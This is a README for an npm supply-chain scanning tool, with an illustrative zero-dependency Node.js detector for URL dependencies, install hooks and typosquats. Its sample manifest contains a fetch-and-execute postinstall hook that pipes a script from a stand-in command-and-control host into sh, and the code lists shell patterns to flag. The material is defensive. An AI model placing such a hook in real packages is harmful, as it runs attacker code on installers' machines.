Security auditing toolkit for detecting npm supply chain attacks. It looks for attack patterns that `npm audit` (which only reports known vulnerability advisories) misses: URL dependencies (PhantomRaven-style attacks, where a dependency is fetched from an arbitrary host instead of the registry), malicious lifecycle scripts, typosquatting, and suspicious package metadata.

Zero npm dependencies by design: a security tool that itself depended on npm packages would be exposed to the same attacks it is trying to detect.
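The checks named above, as an added example rather than npm-scanner's own code: a zero-dependency Node.js script that walks a parsed package.json and flags URL/git dependency specifiers, install-time lifecycle hooks (with a hard fail on fetch-and-execute shell patterns), and package names one edit away from a well-known name. The helper names, the popular-package list, the `example.test` hostnames and the sample manifest are all constructed for illustration and are not taken from the project.

```javascript
// Added example, not npm-scanner's own code: a zero-dependency Node.js
// check for the package.json red flags described above. The sample
// manifest, hostnames and popular-package list are constructed.
'use strict';

// Specifiers that are not registry semver ranges. Code pulled from an
// arbitrary URL or git host is the PhantomRaven pattern: the tarball can
// change without the registry noticing.
const URL_SPEC =
  /^(https?|git|git\+\w+|ssh|file|link):|^(github|gitlab|bitbucket|gist):|^[\w.-]+\/[\w.-]+(#|$)/i;

// Hooks npm runs automatically during `npm install`, with no prompt.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Shell fragments that rarely belong in the install hook of a library.
const SUSPICIOUS_SHELL = [
  /\bcurl\b/, /\bwget\b/, /\|\s*(ba)?sh\b/, /\bbase64\b/, /\beval\b/,
  /\bnode\s+-e\b/, /child_process/, /\bchmod\s+\+x\b/,
];

// Constructed list of well-known names a typosquatter would imitate; a
// real scan would compare against the registry's most-downloaded names.
const POPULAR = ['lodash', 'express', 'react', 'chalk', 'axios', 'commander'];

// Plain Levenshtein distance (insert, delete, substitute), two rows at a time.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const subst = prev[j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1);
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, subst);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Closest popular name within one edit of `name`, or null. Exact matches
// are not typosquats; scoped look-alikes (@evil/lodash) need a separate check.
function typosquatTarget(name, popular = POPULAR) {
  if (popular.includes(name)) return null;
  return popular.find((p) => editDistance(name, p) <= 1) || null;
}

// Walk a parsed package.json and return one finding per red flag.
function scanManifest(pkg) {
  const findings = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (URL_SPEC.test(String(spec))) {
        findings.push({ type: 'url-dependency', name, detail: String(spec) });
      }
      const target = typosquatTarget(name);
      if (target) findings.push({ type: 'typosquat', name, detail: `one edit from ${target}` });
    }
  }
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!scripts[hook]) continue;
    const hit = SUSPICIOUS_SHELL.some((re) => re.test(scripts[hook]));
    // Any install hook deserves a look; a network fetch piped to a shell is a hard fail.
    findings.push({ type: hit ? 'malicious-script' : 'lifecycle-script', name: hook, detail: scripts[hook] });
  }
  return findings;
}

// Constructed manifest exercising each detector (example.test is a reserved TLD).
const SAMPLE_MANIFEST = {
  name: 'demo-app',
  dependencies: {
    lodash: '^4.17.21',                                                // clean
    expres: '^4.18.0',                                                 // one edit from express
    'ui-helpers': 'https://packages.example.test/ui-helpers-1.0.0.tgz', // URL dependency
    'build-tool': 'github:someuser/build-tool#main',                   // git shorthand
  },
  scripts: {
    build: 'tsc -p .',                                                 // not an install hook
    postinstall: 'curl -s https://c2.example.test/x.sh | sh',          // fetch-and-execute
  },
};

for (const f of scanManifest(SAMPLE_MANIFEST)) {
  console.log(`[${f.type}] ${f.name}: ${f.detail}`);
}
```

Run it with `node` on any Node.js version; it needs nothing from the registry, which is the same property the project relies on. Against the sample manifest it reports four findings: the `expres` typosquat, two URL dependencies, and the `postinstall` hook. A real scan would additionally resolve each dependency's published package.json from the registry, since the hooks that matter are the ones in the dependency, not in your own manifest.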
```bash
git clone https://github.com/virtualian/npm-scanner.git
cd npm-scanner

# Scan globally installed packages
./npm-scanner.sh scan --global

# Scan project dependencies
./npm-scanner.sh scan --project ~/code

# Validate a package before installing
./npm-scanner.sh validate lodash
```

Full documentation: virtualian.github.io/npm-scanner
Requirements:

- Bash, jq, curl
- Node.js (no npm dependencies)

License: ISC